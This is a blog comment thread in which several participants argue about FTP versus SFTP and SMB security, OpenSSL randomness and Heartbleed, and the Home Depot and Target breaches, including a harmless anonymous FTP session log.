    Care to dig yourself any deeper holes, Robert?

  40. DrLoser says:

    The binary for the ftp client on my system is only 20% of the size of the binary for wget, for instance.

    I’ve got to admit, Robert, that is a pretty compelling sales point.

  41. DrLoser says:

    Incidentally, it’s hilarious that you mentioned HTTP.

    You do know the default protocol for downloading a file through HTTP, don’t you, Robert?

    Clue: three letters, starting with an F and continuing on. The big difference here is that the TCP/IP port for FTP is not used for this purpose.

    There’s actually a transport mechanism called HTTP, which allows for logging, auditing, specific app controls, all sorts of things like that … even levels of security like SHTTP … but otherwise it behaves precisely the same as an FTP server.

    Minus the lunacy of leaving ports 20 and 21 open to the outside world, of course. And possibly at a cost of 20% bitty overhead.

  42. DrLoser says:

    You should be able to do more with less hardware/time/money with an FTP server rather than HTTP or SMB. That could be important where the volume of data is very high or the value is very low, typical of many archives of FLOSS, for instance.

    Well, security comes at a price, Robert. You don’t offer any figures, so let’s go with my home system here: runs at 2Gbits a second, I think. And let’s postulate that a secure system costs a hundred times more bits per second (it doesn’t).

    Here I am, sitting at home as a Head Honcho of my local Target store. I feel the desperate need to download a file at 20:00, outside work.

    Oh look, using proper secure methods I can actually download a 100 megabyte file in roughly … er … a minute.

    That’s a tough price to pay. Why, I might not even have the time to brew a cup of 50¢ coffee while I’m waiting.

  43. DrLoser says:

    You did not mention “outward-facing” or “to the web”, just “firewalls”.

    Nor did I mention the specific port involved, the details of whether to choose SFTP or FTPS or your favourite vsftpd, Robert.

    I have probably omitted a dozen or so other footnotes that might be deemed appropriate.

    I have to assume that any reader competent in IT, when they see a throw-away reference to FTP in regard to a massive security breach, will draw the conclusion that I am talking about outward facing FTP servers.

    I also have to assume that any reader on this site is competent in IT. It’s just a courtesy thing, I know, but I assume that everybody here is competent in IT.

    The simple term firewalls might just have given my meaning away, incidentally. Quick question: where is a firewall most useful?

    I’ve shown several corporate firewalls allowing FTP.

    Yes, Robert, you have. You have cited precisely two (Red Hat in 2001 and IBM in whenever) that allow FTP downloads of packaged software to an FTP client, which is fair enough.

    Do you know where those firewalls might be? They’re on the other side of the server charged with the FTP downloads. Between that server and the corporate network. Unless Red Hat, IBM, or both are certifiably insane. Which they are not.

    And now back to “moving the goal-posts.”

    Do you have a clear explanation of your reasoning to deny the obvious fact that any other poster, say, oiaohm, is “moving the goal-posts” by bringing in an extrinsic subject such as M$ Office?

    Presumably not. Well, then, how do you explain the fact that everything you have said so far about FTP is completely useless to a company like Target or Home Depot, when it comes to preventing the extraction of stashed security-relevant data from outside the corporate network?

    I mean, it’s not even as if you’re offering a Linux alternative.

    I can offer several, if you ask nicely.

  44. DrLoser says:

    I know of very few firewalls that allow SMB/CIFS through to the Internet so those FTP and e-mail options can be very useful.

    Also, insanely dangerous. Although it isn’t clear to me where e-mail comes into the equation. Moving the goal-posts again?

    Given your stated aversion to anything Microsoft, Robert, I would expect you to have come across precisely no firewalls that allow SMB/CIFS ports (139 and 445) left open. But it worries me greatly that you know of “very few,” that is, more than a single one.

    Tell those idiots to stop doing it, right now.

    oiaohm asserts that there are certain “multi purpose printers” for which Microsoft requires access via FTP. My assertion is that, saving the odd piece of garbage that even an SME would turn their nose up at, there are none.

    And, pardon me, but the Xerox Phaser 6128 comes plentifully equipped with direct drivers for Windows 7, Windows Vista, Windows XP, and I haven’t looked but very probably Windows Server 200x.

    No FTP required. If some idiot wants to force FTP on the thing, it’s up to them.

    The question is not whether you can configure a “multi-purpose printer” to be used via FTP.

    The question is, why would you want to? And a secondary question: why would you want this ability from outside the Corporate domain?

  45. DrLoser, accusing me of moving goalposts, wrote, “It is blatantly unsuited to use as an outward-facing corporate file transfer system.”

    This was his original statement:
    Sane corporate firewalls bar FTP

    You did not mention “outward-facing” or “to the web”, just “firewalls”. I’ve shown several corporate firewalls allowing FTP. I’ve seen some firewalls that even block ftp clients from getting out to download stuff from the web but there do exist a lot of sane folks who value FTP for what it is and do use it wisely. They are not insane.

    There are a lot of very good reasons to use FTP in special cases where security is not paramount. You should be able to do more with less hardware/time/money with an FTP server rather than HTTP or SMB. That could be important where the volume of data is very high or the value is very low, typical of many archives of FLOSS, for instance. In my particular use of FTP, we have a service where any visitor to our home with iThingy, Android/Linux or even that other OS can share/examine our extensive file-collection. e.g. Christmas photos from when so-and-so was a baby, or this cute cartoon I found on the web, and photos from whatever smart thingy is on the LAN.
    Compare that to my first experience of “7” when all our networked printers that worked fine with SMB/CIFS from XP would not work with “7”. Forget scanning. PRINTING.

  46. DrLoser, becoming a real bore, wrote, “Again with this drivel about “multi function network printer/photocopiers.” I’ve never seen or heard of one that requires using FTP. Have you? Which model? ”

    I have one. Xerox MFP 6128.
    “Depending on the printer’s connection (USB or Ethernet), you can send scanned files directly from the printer’s control panel to a computer, an FTP server, or to email. You can also scan directly into an application from a computer.”

    I know of very few firewalls that allow SMB/CIFS through to the Internet so those FTP and e-mail options can be very useful. We use FTP because it works for every device here.

  47. DrLoser says:

    DrLoser, moving the goalposts, wrote, “Specifically, outward facing http://FTP.”

    You read that long piece by oiaohm, in which he moves the goalposts so far over the horizon that he brings M$ Office onto the playing field, and you accuse me of “moving the goalposts, Robert?

    I admire your hyper-selective chutzpah.

    No, I’m not moving the goalposts. As you will recall, the FTP discussion started with my demolition of Dougie’s credit-card myth, in which I mentioned FTP only in passing.

    Since you chose to take up the subject (and since I made the comment clearly in reference to Black Hats retrieving stashed security-sensitive information from the outside), I believe the onus is on you to avoid “moving the goalposts.”

    Whether or not FTP is suitable to your strictly domestic needs … whether or not IBM or Red Hat choose to use it in a sandboxed way to download software packages …

    It is blatantly unsuited to use as an outward-facing corporate file transfer system.

    That was my point in the first place, and it remains my point now. My goalposts stand precisely where they stood at the beginning. Yours (and oiaohm’s) seem to shift with the sands.

  48. DrLoser, moving the goalposts, wrote, “Specifically, outward facing FTP.”

    Well, inward or outward, on LANs and the web, FTP is still very useful and widely used by sane people. It was never designed for security but simplicity/speed/efficiency.

    The binary for the ftp client on my system is only 20% of the size of the binary for wget, for instance.

    Several very simple means of securing ftp servers exist, including: read-only file-systems, chroots, virtual machines. transfers via SSH, checksums and signatures. SFTP which has been mentioned here is transferring files by SSH and shares little if any code/protocol with FTP, but it’s what I use when I want to securely transfer files, say to/from some personal account. FTP is what I use when I want to move a lot of stuff in a hurry and security is little/no consideration.

  49. DrLoser says:

    Once again, oiaohm (and Robert): that discussion was about FTP.

    It wasn’t about OpenSSL. In fact I used OpenSSL as a mitigation for the apparent number of CVEs linked to FTP.

    It wasn’t about Microsoft.

    It most certainly was not about some mythical horde of FTP-reliant multi purpose printers foisted by the Evil Ones on global corporations at large.

    It was about FTP. Specifically, outward facing FTP.

  50. DrLoser says:

    SSL/TLS standards put requirements on how your random generator should operate this executes using undefined buffer methods because you are meant to use a formally audited random number generator.

    Not as far as I am aware, they don’t. In fact, it’s hard to see how they could, short of having a Reference Suite.

    DrLoser this is a problem when you start commenting on stuff you don’t understand.

    Obviously it is, oiaohm. May I gently suggest that you stop doing it?

    Due to Valgrind hitting there random number generator OpenSSL developers were closing all bugs submitted based on Valgrind testing so thousands of detectable memory issues exist inside Openssl…

    Pure fantasy. Or do you invite the OpenSSL developers round to tea every Wednesday afternoon for a cozy little chat about progress?

    MS Office has also had above average CVE for it than the average this is also explained when you found out the file format they were using was not documented.

    a) Not especially relevant to file transfer, is it?
    b) How would one go about calculating this “average”?

    The answer is every third party who looked at OpenSSL properly got ignored.

    Including Debian, Red Hat, Ubuntu … this is hardly a defence of GNU/Linux, is it?

    “Don’t worry about security, Ma’am … we’ve decided to ignore it. That’s the industry standard, y’see!”

    I have some big bad news for you. Windows uses third party FTP servers a lot in business.

    I have some “big bad news” for you. It doesn’t.

    Again with this drivel about “multi function network printer/photocopiers.” I’ve never seen or heard of one that requires using FTP. Have you? Which model? Where did you dumpster-dive it from?

  51. oiaohm says:

    DrLoser even before debian SSL bug the entropy of OpenSSL is broken just not as badly.

    1) Why anybody would rewrite even a pathetic randomisation process, simply because Valgrind told them to do so, is beyond my comprehension.
    Its not just a breach of Valgrind what OpenSSL is doing is a breach of SSL/TLS standards as well. SSL/TLS standards put requirements on how your random generator should operate this executes using undefined buffer methods because you are meant to use a formally audited random number generator. Using undefined buffer never passes formal auditing.

    DrLoser this is a problem when you start commenting on stuff you don’t understand. Due to Valgrind hitting there random number generator OpenSSL developers were closing all bugs submitted based on Valgrind testing so thousands of detectable memory issues exist inside Openssl this is why there is now a huge cleanup with new personal employed by the Linux foundation supervising. This means items like hartbleed get to exist due to improper management of project. Yes improper auditing and bug processing in OpenSSL has resulted in it having many times the number of CVE issues it should have had. Above average CVE numbers of a SSL implementation (you can replace this with any type of program) should raise major alarm bells. MS Office has also had above average CVE for it than the average this is also explained when you found out the file format they were using was not documented. Its very hard to audit anything when you don’t have it documented how it should work.

    2) Why the developers of the relevant bit of SSL would conclude that their implementation had any sane amount of entropy is also beyond me.

    The answer is every third party who looked at OpenSSL properly got ignored. This is why the Linux foundation is starting a audit team now. So we have a group with enough respectable force to hopefully to get project leads proper attention and if that fails has the resources to advertise the issues. Gnutls that has issues but does in fact have a random number generator that is conforming to specification for the SSL/TLS standards and Gnutls does not use undefined buffers. If you wanted to pick the most conforming out of Openssl and Gnutls you would be forced to choose Gnutls. Yet due to LGPL license on Gnutls lot of closed source developers were choosing Openssl. This is the problem Openssl taint is everywhere.

    In fact Gnutls and other closed source SSL developers had question OpenSSL entropy again got no media coverage or support to force OpenSSL project lead to fix stuff. It seams we have to have an exploit before we will be breathing down project lead/company necks about security.

    DrLoser
    But not a single one of them, as far as I can see, mentions That Other OS.
    I have some big bad news for you. Windows uses third party FTP servers a lot in business. Some is is really stupid reasons. For example multi function network printer/photocopier you can find some those only will scan to a FTP server dependably in fact fail when sending to a SMB share. Guess what Microsoft FTP server not installable on desktop client result is a huge stack of different levels of insecurity versions of FTP on Windows. Reality I agree with Olderman that FTP mostly should die. FTP even the SFTP has no idea of multi domains to a single IP address. But I also think FTP server should be made part of the client OS for hardware compatibility and to kill of the security from hell problem. Not only are these Windows client machines using insecure versions that use like broken Openssl they are also not being updated. FTP mess is way worse on Windows than Linux or OS X. OS X and Linux have upstream provided FTP servers so you don’t have a third party mess.

    DrLoser CVE is kinda deceptive here because since a Third party provide the ftp server to Windows Desktop OS it not branded as a Windows or Microsoft issue. Learn to read CVE with a little more due care. There are many things to stare at Microsoft over and say fix.

  52. olderman says:

    “The second thing we did was to shut down all the FTP ports.”

    oh BTW, nice try Robert Pogson, Reaching an Anonymous FTP site hosted by an academic institution is nothing exciting. such sites have been around since the dawn of the internet (simtel20 anyone?)

    Any hosts with important information behind state-full firewalls with tightly controlled inbound access for local objects and zero access direct from the internet.

    And interestingly enough, while Mrpogson.com does indeed reject ftp requests, it does respond quite nicely to an sftp open request. You may want to look at that.

  53. dougman says:

    I would not call this a failure, but it sure looks like M$ wants everyone to be able to use their SERVICES. I’ve been a Skype user since 2003, and of late have used Google hangouts along with WEBRTC interface.

    “When Skype for Web does enable WebRTC, it should work just fine on Chromebooks as well.”

    http://www.pcworld.com/article/2847863/microsoft-announce-skype-for-web-beta-brings-voice-and-video-calls-to-your-browser.html

  54. DrLoser says:

    This isn’t even a discussion about M$, Robert. It’s a discussion about the merits of FTP in any of its forms.

    The one time I did a security audit, I was working for a telecoms company (supplying BT with most of their non-core, DSLAM access) whose entire system was either Solaris (servers) or Linux (desktops).

    The first thing we did was to close off the FTP ports. Including SFTP, as it happens.

    No, wait a mo’, my memory is leading me astray. The first thing we did was to shut down all the RPC ports.

    The second thing we did was to shut down all the FTP ports.

  55. DrLoser says:

    I never claimed FTP was secure but that it was efficient.

    That isn’t what you claimed at all, Robert. Take that M$ claim, for example — nothing to do with “efficiency.” Also hopelessly wrong, in re FTP.

    When security doesn’t matter:
    1)data is of no value to spies and
    2)data has an independently confirmed signature/checksum

    And this would apply to Home Depot and to anybody else who has an unsecured FTP port that allows an outsider to browse around their file system and retrieve stashes of data, how?

    I hardly think that the presence, or absence, of a PGP signature is going to cause such people even a moment’s thought.

    But, to your claims:

    Many wrap it with SSH if they need greater security, but IBM and others are quite sane to use FTP.

    For proof, you link to an IBM site specifically designed for downloading via FTP. This hardly counts, as far as security goes, does it, Robert? There are going to be layers and layers of security beyond that point to stop an infiltrator getting to the corporate IBM network, which is what we are talking about here.

    FTP is very efficient for transferring large files like backups or image-files.

    Or, indeed, files containing hundreds of thousands of batched credit card information.

    I believe that was rather the point here, Robert.

    Back in the day, RedHat boasted of the performance of their FTP servers…

    Back in 2001, yes. For downloading pre-packaged distros, yes (as per your IBM cite). For the purposes of a discussion about hacking into Home Depot, this is completely irrelevant.

    Where signing the files or sending checksums is sufficiently secure, FTP is hard to beat.

    Something of a circular argument, I feel. And it also leaves out the small but relevant fact that, if you have an insecure FTP server facing outwards from your corporate network, sending legitimate files to legitimate destinations should be the very least of your concerns.

    Many LANs allow FTP connections and they are sane.

    And precisely zero LANs offer access from the outside into a corporate network. Perhaps that is why they are called Local Area Networks.

    OTOH, I think many organizations are insane to use SMB/CIFS on their LANs.

    Fortunately “many organizations” have an approach to security that is not, like yours, buried in the Stone Age.

    M$’s protocols are just too bloated to be efficient or secure.

    I believe you are thinking of “OpenSSL” here. SMB/CIFS is quite lean in comparison. And it’s also in continuous development by security experts. Unlike OpenSSL.

    We use FTP on our LAN for commodity files like images from the smart thingies, cameras or scanner. It works like a charm.

    For that purpose, yes.

    For any purpose that involves security, no it does not.

  56. olderman wrote, “Many companies use FTP out of ignorance or issues supporting SFTP.”

    Like this?
    ftp> open ftp.cs.nyu.edu
    Connected to cs.nyu.edu.
    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
    220-Local time is now 07:39. Server port: 21.
    220-Only anonymous FTP is allowed here
    220-IPv6 connections are also welcome on this server.
    220 You will be disconnected after 15 minutes of inactivity.
    Name (ftp.cs.nyu.edu:pogson): anonymous
    230-Your bandwidth usage is restricted
    230 Anonymous user logged in
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> passive
    Passive mode on.
    ftp> cd /pub/courses/unixtools
    250 OK. Current directory is /pub/courses/unixtools
    ftp> get README
    local: README remote: README
    227 Entering Passive Mode (128,122,49,30,185,21)
    150 Accepted data connection
    226-File successfully transferred
    226 0.005 seconds (measured here), 133.52 Kbytes per second
    729 bytes received in 0.00 secs (11.3972 MB/s)
    ftp> bye
    221-Goodbye. You uploaded 0 and downloaded 1 kbytes.
    221 Logout.

  57. olderman says:

    “FTP is great and corporations large and small use it. ”

    Many companies use FTP out of ignorance or issues supporting SFTP. SFTP is the secure form of FTP that is standard on ALL linux systems (Its part of the ssh libraries along with the secure form of RCP called SCP).

  58. DrLoser wrote, “Here, Robert. I’ve taken the liberty of asking Mitre for the last three years of CVEs with “FTP” as a keyword.”

    If you change that to a specific product, like vsftp, you get two hits, one for a Linux kernel bug and another for a libc problem, not ftp. If you search for netkit-ftp or netkit, you find nothing. Those are the client ftp on Debian Jessie.

    Again, corporations and others use FTP for efficiency not security.

  59. DrLoser wrote, “Here, Robert. I’ve taken the liberty of asking Mitre for the last three years of CVEs with “FTP” as a keyword.”

    Many of those have to do with OpenSSL, nothing to do with FTP per se. One can do FTP over SSH of course.

  60. DrLoser wrote, “But not a single one of them, as far as I can see, mentions That Other OS.
    I submit that this is a fatal flaw in your premise.”

    I never claimed FTP was secure but that it was efficient. When security doesn’t matter:
    1)data is of no value to spies and
    2)data has an independently confirmed signature/checksum
    FTP is great and corporations large and small use it. You are the one who claimed they don’t.

  61. DrLoser says:

    Folks who don’t use M$’s OS have no problem with FTP as a protocol.

    Folks who don’t use M$’s OS must have a hopelessly serene attitude to having their system thoroughly compromised, then.

    Here, Robert. I’ve taken the liberty of asking Mitre for the last three years of CVEs with “FTP” as a keyword.

    Right at the top, from the end of October, you will notice CVE-2014-4877, which prominently features the word GNU and has a severity rating of 9.3/10.

    Now, this is pretty much a brute force lookup, and the word “OPENSSL” occurs with depressing regularity, so not all the hundreds of CVEs (in only the last three years, note) can be said to be FTP flaws.

    But not a single one of them, as far as I can see, mentions That Other OS.

    I submit that this is a fatal flaw in your premise.

  62. That Exploit Guy says:

    Folks who don’t use M$’s OS have no problem with FTP as a protocol.

    I have no problem with protocols that provide rudimentary ways to distribute files.

    I also have no problem with big box outlets that demand rudimentary ways to distribute files. After all, we all have files that require rudimentary ways to distribute, right?

    I only have problems with big box outlets that neglect to diversify, and FTP is simply not a good way to diversify.

    Instead, they should use BitTorrent. Encrypt the shared files for greater security, if they must.

    The last thing anyone needs is a centralised, brand-dependent protocol like FTP.

  63. That Exploit Guy says:

    I can’t argue with the negligence of those big box outlets but it surely didn’t help them to rely on M$ for IT.

    I am pretty sure everyone has his or her own morning rituals, you know, brushing one’s teeth with a particular brand of toothbrush, eating a particular brand of cereal, boiling water with a particular brand of kettle, and driving to work in a particular brand of vehicle.

    Sure enough, this reliance on particular brands is a bad idea, or dare I say, “negligence”?

    This is why we need diversifying. In other words, we need to brush each tooth with a different brand of toothbrush, make sure each bowl of cereal we eat consists of various brands and types, boil each drop of our favourite beverages in a different brand of kettle and seat each of our bum cheeks in a different brand of vehicle.

    Only then, we may call ourselves “diligent” and “attentive”.

  64. DrLoser wrote, ” Sane corporate firewalls bar FTP.”

    I can’t argue with the negligence of those big box outlets but it surely didn’t help them to rely on M$ for IT. Folks who don’t use M$’s OS have no problem with FTP as a protocol. Many wrap it with SSH if they need greater security, but IBM and others are quite sane to use FTP. FTP is very efficient for transferring large files like backups or image-files. Back in the day, RedHat boasted of the performance of their FTP servers

    Where signing the files or sending checksums is sufficiently secure, FTP is hard to beat. Many LANs allow FTP connections and they are sane. OTOH, I think many organizations are insane to use SMB/CIFS on their LANs. M$’s protocols are just too bloated to be efficient or secure. We use FTP on our LAN for commodity files like images from the smart thingies, cameras or scanner. It works like a charm.

  65. DrLoser says:

    DrLoser think about this if in 2003 the memory errors had been forced to be fixed up the hartbleed bug would not have been in existence by the time it was exploited. Yes the 2003 valgrind logs in the openssl bug list include the hartbleed bug location. Hartbleed is a direct result of neglect and project lead being a idiot and believing a myth.

    I’ve taken the appropriate time to think about it, oiaohm… Done.

    The memory “errors” are twofold.

    1) Why anybody would rewrite even a pathetic randomisation process, simply because Valgrind told them to do so, is beyond my comprehension.
    2) Why the developers of the relevant bit of SSL would conclude that their implementation had any sane amount of entropy is also beyond me.

    Oh, and how you, oiaohm, have managed to conflate the original Debian SSL exploit with what you call “hartbleed,” but which is more typically referred to as Heartbleed, is also beyond me.

    The original Debian SSL bug was to do with entropy.

    Heartbleed simply involved the ability to harvest OOB memory, which might or might not include PK encryption information.

    Do try to keep up, oiaohm.

  66. DrLoser says:

    Robert Pogson exactly. Undefined buffers. There contents are annoying defined.

    That’s the thing about “undefined buffers,” oiaohm. They are annoyingly defined.

    Or … well, y’know … whatever.

  67. DrLoser says:

    Oh, wait, for a moment there I thought that “xrdp” was something exciting and useful.

    Not that I wish to deprecate terminal servers. I cut my teeth on multiplexing the things. A little, shall we say, 1980s or so?

  68. DrLoser says:

    Just noticed this, Robert.

    I’m sure there’s an equivalent functionality for that other OS, say Cygwin/X or xrdp (deleted from Wikipedia, eh?), homepage here.

    Well, you know what Wikipedia is like when it comes to shameless self-promotion without any factual backing, Robert.

    Here’s your chance to get one over on the buggers!

    What is “xrdp,” anyway?

    And how, in even the vaguest terms, might it compete with an enterprise-ready “mail and calendaring” system?

    I mean, kolab is obviously a lost cause. But this xrdp thing might be a runner …

    … Shout it out for us!

  69. DrLoser says:

    DrLoser something to be aware of is some of random number generators in Microsoft Applications use the undefined buffer method.

    Really, oiaohm?

    Do tell. Also, cite a link.

  70. DrLoser says:

    Why is that last but one comment “awaiting moderation,” Robert?

    Not a single swear word. Not even an ad hominem.

    If you really wish to impose a ban-hammer, then impose a ban-hammer. This Mary Poppins stuff does not become you.

  71. DrLoser says:

    Incidentally, devotees of the “Closing Every Window” philosophy will be delighted to hear of the up-to-the-moment Security Conscious decision made by Home Depot to avoid any future issues:

    They bought all their executives Macs.

    Or, to quote:

    Their dated company Windows computers and old smartphones with Apple, Inc. (AAPL) Macs and iPhones, which IT staff claims is more secure.

    Wot no GNU?

    The executive staff calls their new Apple phones “Bat Phones.”

    How very sweet.

    And how utterly unrelated to the original issue.

    Still, executives will be children, I suppose.

  72. DrLoser says:

    However, since you brought up credit cards, oh what was the major flaw that Home Depot just suffered? They blamed M$ Windows and reliance on Win-Dohs is going to cost them hundreds of millions.

    Interesting you should bring that up, Dougie, since I have six years’ insider knowledge from Visa. (As compared to your, I believe, big fat zero.)

    1) At the time of purchase, XPe was technically about as good as it got on embedded POS systems. OS/2 was getting creaky. Embedded Linux was still in its “start-up” phase. If you wanted your POS terminal to work in 2003, you probably wanted to buy Microsoft.
    2) As of 2013, these systems were ten years old. And people had been begging Home Depot to upgrade to something with proper memory protection like embedded Windows 7 for quite some time.
    3) Giant retail operations like Home Depot or Target are seemingly more interested in paying off a CEO for IT negligence to the tune of $28 million, rather than spending this money on IT security.

    That, unfortunately, is the way it is. None of these companies is truly capable of running a secure IT system. It doesn’t really matter which OS they choose.

    To the technical details:
    1) I’m sure I don’t have to explain to you, Dougie, what “RAM scraping” is. Well, perhaps I do. But I’m not going to.
    2) In order to “RAM scrape” credit card details, etc, from an embedded device of whatever OS, you need to cross the security boundary from the outside world to the POS.
    3) You can’t do this by waving a magic wand, or carefully crafting a bogus credit card.
    4) You can only do this by subverting the server that updates the firmware.
    5) In the good old days (1994-2000, when I worked at VISA), this server belonged to the Clearing System — eg Visa or MasterCard. We (VISA) ran it on a whopping great AIX box that, in its spare time, hosted Big Blue, the chess wizard.
    6) Apparently this is no longer so.
    7) Evidently the same idiots who cannot be bothered to update their POS systems (Home Depot, Target, etc) are in charge of the servers that do the firmware updates.
    8) These servers are the parts of the system that are the gateway to being compromised.
    9) The way this works is that the compromised server stashes credit card information for later retrieval.
    10) This later retrieval — Robert will be pleased to hear — is apparently often done via FTP. Sane corporate firewalls bar FTP. Home Depot and Target … who knows?

    And you may be wondering how the servers were compromised in the first place? Well, nobody has satisfactorily answered that question. But here’s one reasonable supposition:

    Hackers commonly use SQL injection, packet sniffing, or spear phishing to steal the login credentials of the targeted retailer or an affiliate (as in the Target hack) with high-level access.

    Hard to blame M$ for any of that, isn’t it?

    As always, it boils down to cheapskate corporate stupidity.

    Not to the supplier of the Operating System. But, back to the sadly misinformed Dougie:

    At least M$ can not be sued or held responsible, as Home Depot did agree to the EULA when they used M$ software. Fair wouldn’t you say?

    I wouldn’t know: I’ve never read the Windows XPe EULA. Nor, for example, have I read the equivalent OS/2 EULA. Nor the EULA for Oracle POS machines, which I understand use Linux.

    Naturally, you, Dougie, have read and fully digested the implications of all three. May I request a brief summary of the relevant details?

  73. oiaohm says:

    Robert Pogson exactly. Undefined buffers. There contents are annoying defined. If you are lucky you will have a Undefined buffer pointing to somewhere containing random data. Majority of the time it will be pointing to somewhere constant or somewhere that with a minor coding change will turn constant.

    Majority of computer ram from a program point of view on Linux is filled with constant values.

    Further, in a snapshot of RAM there’s no guarantee the sample won’t be a large patch of constants and text in some software using a tiny portion of the bandwidth of a good random-number generator.

    There is a Further more that there is no guarantee that the sample will not just be a full block of same constants every time the program runs. Due to the way compliers and linkers optimize binaries a undefined buffers sample will come from the exact same area all the time. The point can be calculated by attackers. The fact that these alignments are constant are how some exploits work. For someone claiming to be a master of Exploits not to know this suggests they need to find themselves a new better name.

    DrLoser something to be aware of is some of random number generators in Microsoft Applications use the undefined buffer method. Lot of computer science courses teach the buffer makes random method but fail to tell students what they should fill the buffer with so idiot students do exactly what Exploit guy did and when they see the number changing think everything is fine when its not. 1 buffer must be filled with unique values. 2 you want to use sources like sound card noise, network traffic transfer lags, cpu random generator….. stuff that can truly generate a few bits random mixed with each other. 3 be small enough not to be able to include every value or a too large of percentage. Result increasing entropy. There are quite a few good books and standards on how to make decent random number generators with decent entropy not one of them recommends the undefined buffer method.

    Use buffer to random method correctly get good results. Do what Exploit guy did get something that can break easily and worse of all is not generating the random you would be expecting.

    The Debian SSL issue failed to raise the alarm bells it should of. There are a lot of improperly trained programmers out there using undefined buffers as random sources. The first case of alarm bells with openssl being raised over the use of undefined buffers is 2003. People are very good at putting our heads in sand over these kinds of problems.

    DrLoser think about this if in 2003 the memory errors had been forced to be fixed up the hartbleed bug would not have been in existence by the time it was exploited. Yes the 2003 valgrind logs in the openssl bug list include the hartbleed bug location. Hartbleed is a direct result of neglect and project lead being a idiot and believing a myth.

    Hartbleed is a direct result of Myth that undefined items can be safe to use. There are equal bugs in Windows turning up all the time that trace to the same issue.

    TMR stats there job is to nuke myths of the FOSS world. Here is one go get them. Its a huge myth with lots of high level people needing skinning. I think somehow it out of your level.

  74. oiaohm wrote, “Take into account on how many are pointers and how this effects their random value”

    A lot of memory in a digital computer is full of characters of the alphabet, zeroes, ones, and instructions. It’s is interesting that in a programme on a machine with hundreds of possible op-codes, just a handful may account for the majority. I once worked on some source-code that had been damaged by a hardware error. Every “A” was changed to an “I” and I had to go changing LIC and DIC to LAC and DAC, the two most common instructions on the PDP series of machines, load and deposit accumulator… Further, in a snapshot of RAM there’s no guarantee the sample won’t be a large patch of constants and text in some software using a tiny portion of the bandwidth of a good random-number generator.

  75. oiaohm says:

    DrLoser by the way run the maths on the 150 unique values. Take into account on how many are pointers and how this effects their random value. Result is instead of a 4 billion entropy TEG example has under 1 million entropy. Sorry TEG example is broken in so many ways its not funny. Linux kernel random number generator might not be the best but its way better than a random number generator based on undefined buffers on systems that secure memory between processes.

    Problem is 1 million entropy level is enough to fool most people that something is a random number generator. As soon as someone start suggesting unallocated memory has a place in a random number generator you know your are in trouble. There are many other sources that are so much better. Really DrLoser you should have been the one to drop the brick bat on TEG for being stupid. But you are too busy looking at me to take care of your own members.

  76. oiaohm says:

    DrLoser
    It’s completely off-topic from TEG’s successful demonstration that you don’t have a clue what you’re talking about, oiaohm, but it does demonstrate that you can get a perfectly serviceable amount of entropy out of a random Linux memory page.
    No TEG did demo that you could use a random Linux Momory Page you are complete wrong what TEG code was doing.

    http://mrpogson.com/2014/10/31/more-failures-of-the-wintel-monopoly/#comment-216103
    This here is the critical bug DrLoser. This is just accessing a different random page, The page following the page TEG code was accessing. Result always 0.

    TEG was only accessing 1 particular page. Due to accessing that 1 particular page appeared to get random results. A page that contains pointers that are randomized. For pointers to be randomized address space randomization has to be on. Turn that off it breaks.

    To be correct TEG just came up with an extremely long winded way of accessing the Linux random number generator with reduced entropy.

    DrLoser are you aware that .so and .a file under Linux have constructors. TEG said I could use what ever flag I liked to jam. -l[right library] jammed because the library constructor nicked the first 4kb so now the memory in buf is zeroed. Libraries get first chomp at memory not your application. The order Libraries get chop at the memory are based on where they are in the build command.

    DrLoser basically if I put the effort in and link the right library I can make a stock debian jam exploit guys code.

    DrLoser also get it right I did not set 100 because I thought that was suitable to display problem. I said 100 because it was simple for humans to compare. Robert made that error not me.

    DrLoser TEG just demoed that he does not know how to code a random number generator and has a complete lack of understanding of what can happen.

  77. DrLoser wrote, “Actually, Robert, there’s only one “Grave functionality bug.”
    And one “Important bugs; Confirmed.”
    And three “Important bugs; More information needed.”
    And one “Normal bugs: Confirmed.””

    I don’t know where you’re looking but the list is much longer
    “Outstanding bugs — Grave functionality bugs; More information needed (1 bug)
    Outstanding bugs — Important bugs; Patch Available (1 bug)
    Outstanding bugs — Important bugs; Confirmed (1 bug)
    Outstanding bugs — Important bugs; Unclassified (18 bugs)
    Outstanding bugs — Important bugs; More information needed (3 bugs)
    Outstanding bugs — Normal bugs; Patch Available (3 bugs)
    Outstanding bugs — Normal bugs; Confirmed (1 bug)
    Outstanding bugs — Normal bugs; Unclassified (82 bugs)
    Outstanding bugs — Normal bugs; More information needed (10 bugs)
    Outstanding bugs — Normal bugs; Will Not Fix (1 bug)
    Outstanding bugs — Minor bugs; Patch Available (2 bugs)
    Outstanding bugs — Minor bugs; Unclassified (20 bugs)
    Outstanding bugs — Minor bugs; Will Not Fix (1 bug)
    Outstanding bugs — Wishlist items; Patch Available (2 bugs)
    Outstanding bugs — Wishlist items; Unclassified (25 bugs)
    Outstanding bugs — Wishlist items; More information needed (1 bug)
    Outstanding bugs — Wishlist items; Will Not Fix (3 bugs)
    Forwarded bugs — Important bugs (1 bug)
    Forwarded bugs — Normal bugs (5 bugs)
    Forwarded bugs — Wishlist items (2 bugs)
    Pending Upload bugs — Wishlist items (1 bug)
    Resolved bugs — Critical bugs (1 bug)
    Resolved bugs — Grave functionality bugs (1 bug)”

    If Debian, alone has forwarded 8 bug reports. How many have Ubuntu, RedHat et al forwarded?

    This one’s about runlevels. Debian is normally in runlevel 2 but systemd uses 5 like RedHat…
    So’s this one

  78. dougman says:

    Bing-A-Ling, quit trying to misdirect the conversation.

    However, since you brought up credit cards, oh what was the major flaw that Home Depot just suffered? They blamed M$ Windows and reliance on Win-Dohs is going to cost them hundreds of millions.

    At least M$ can not be sued or held responsible, as Home Depot did agree to the EULA when they used M$ software. Fair wouldn’t you say?

  79. DrLoser says:

    They both look like rubbish to me. BTW, what’s the licence? Open Source does not necessarily mean Free Software.

    Both? Well, I admire and share your obstinacy about Java, Robert. It does seem to be reasonably popular in the FLOSS world, however. I understand that Google has even managed to stitch together a mobile Gnu/Linux platform off the back of it.

    Now, the license for Dot Net Everywhere.

    Are you seriously going to tell us that you would embrace the concept if only the license corresponded to your rigorous yet hopelessly ill-defined requirements?

    Because, forgive me, Robert, I doubt that. Tell me I’m wrong on that small point.

  80. DrLoser says:

    Win-Doh trolls make big issues over Linux server malware, but how many consumers actually run servers? I say 1%, perhaps even less.

    You really, seriously, walked into that one, didn’t you, Dougie?

    How many consumers have credit cards?

    Related to which, how many consumers use their credit cards over the Web?

